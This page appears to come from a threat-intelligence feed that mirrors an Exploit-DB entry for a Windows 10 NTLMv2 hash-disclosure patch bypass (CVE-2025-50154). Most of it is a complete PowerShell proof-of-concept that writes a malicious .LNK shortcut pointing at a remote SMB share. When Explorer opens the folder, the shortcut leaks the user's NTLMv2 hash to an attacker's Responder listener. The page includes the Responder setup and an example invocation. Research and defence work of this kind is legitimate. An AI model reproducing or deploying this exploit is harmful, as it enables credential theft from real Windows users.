Microsoft Windows 10.0.19045 - NTLMv2 Hash Disclosure
Severity: mediumType: exploit
Microsoft Windows 10.0.19045 - NTLMv2 Hash Disclosure
Indicators of Compromise
- exploit-code: # Exploit Title: Microsoft Windows 10.0.19045 - NTLMv2 Hash Disclosure # Date: 13/08/2025 # Exploit Author: Ruben Enkaoua # Author link: https://x.com/RubenLabs, https://github.com/rubenformation # Original Blog: https://cymulate.com/blog/zero-click-one-ntlm-microsoft-security-patch-bypass-cve-2025-50154/ # Vendor Homepage: https://microsoft.com # Software Link: https://www.microsoft.com/en-us/software-download # Version: All versions prior to patch tuesday august 2025 # Tested on: Windows 10.0.19045 # CVE : CVE-2025-50154 # This exploit if for CVE-2025-24054 Patch Bypass # Start a responder with: # responder -I <interface> -v <# .SYNOPSIS Creates a malicious LNK file that triggers SMB NTLMv2-SSP hash disclosure. This code is for educational and research purposes only. The author takes no responsibility for any misuse of this code. .DESCRIPTION This script generates a .LNK shortcut pointing to a remote SMB-hosted binary file. The shortcut uses a default Windows icon (SHELL32.dll) but still forces Explorer to fetch the PE icon from the remote binary, triggering authentication. .PARAMETER path Local path where the LNK file will be saved (e.g., C:\Users\User\Desktop). .PARAMETER ip IP address or hostname of the remote SMB server hosting the binary. .PARAMETER share The shared folder on the SMB server where the binary is stored. .PARAMETER file The name of the binary file (e.g., payload.exe). .EXAMPLE .\poc.ps1 -path "C:\Temp" -ip "192.168.1.10" -share "malware" -file "payload.exe" #> param( [Parameter(Mandatory=$true)] [string]$path, # -path [Parameter(Mandatory=$true)] [string]$ip, # -ip [Parameter(Mandatory=$true)] [string]$share, # -share [Parameter(Mandatory=$true)] [string]$file # -file ) # Build file paths $shortcutPath = Join-Path $path "poc.lnk" $targetPath = "\\$ip\$share\$file" $iconLocation = "C:\Windows\System32\SHELL32.dll" # Create LNK file $wShell = New-Object -ComObject WScript.Shell $shortcut = $wShell.CreateShortcut($shortcutPath) $shortcut.TargetPath = $targetPath $shortcut.IconLocation = $iconLocation $shortcut.Save() Write-Output "Shortcut created at: $shortcutPath" Write-Output "Target path: $targetPath"
Microsoft Windows 10.0.19045 - NTLMv2 Hash Disclosure
Medium
Published: Mon Aug 18 2025 (08/18/2025, 00:00:00 UTC)
Source: Exploit-DB RSS Feed
Description
Microsoft Windows 10.0.19045 - NTLMv2 Hash Disclosure
Technical Details
- Edb Id
- 52415
- Has Exploit Code
- true
- Code Language
- perl
Indicators of Compromise
Exploit Source Code
Exploit Code
Exploit code for Microsoft Windows 10.0.19045 - NTLMv2 Hash Disclosure
# Exploit Title: Microsoft Windows 10.0.19045 - NTLMv2 Hash Disclosure # Date: 13/08/2025 # Exploit Author: Ruben Enkaoua # Author link: https://x.com/RubenLabs, https://github.com/rubenformation # Original Blog: https://cymulate.com/blog/zero-click-one-ntlm-microsoft-security-patch-bypass-cve-2025-50154/ # Vendor Homepage: https://microsoft.com # Software Link: https://www.microsoft.com/en-us/software-download # Version: All versions prior to patch tuesday august 2025 # Tested on: Windows 10.0.... (1757 more characters)
Code Length: 2,257 characters
Threat ID: 68a3d92dad5a09ad00eed70d
Added to database: 8/19/2025, 1:53:49 AM
Last updated: 8/19/2025, 1:53:49 AM
Views: 1
Related Threats
BigAnt Office Messenger 5.6.06 - SQL Injection
MediumExploitTue Aug 19 2025
RiteCMS 3.0.0 - Reflected Cross Site Scripting (XSS)
MediumExploitTue Aug 19 2025
PHPMyAdmin 3.0 - Bruteforce Login Bypass
CriticalExploitTue Aug 19 2025
Soosyze CMS 2.0 - Brute Force Login
CriticalExploitTue Aug 19 2025
Lantronix Provisioning Manager 7.10.3 - XML External Entity Injection (XXE)
MediumExploitTue Aug 19 2025
Actions
Please log in to the Console to use AI analysis features.
External Links
Need enhanced features?
Contact root@offseq.com for Pro access with improved analysis and higher rate limits.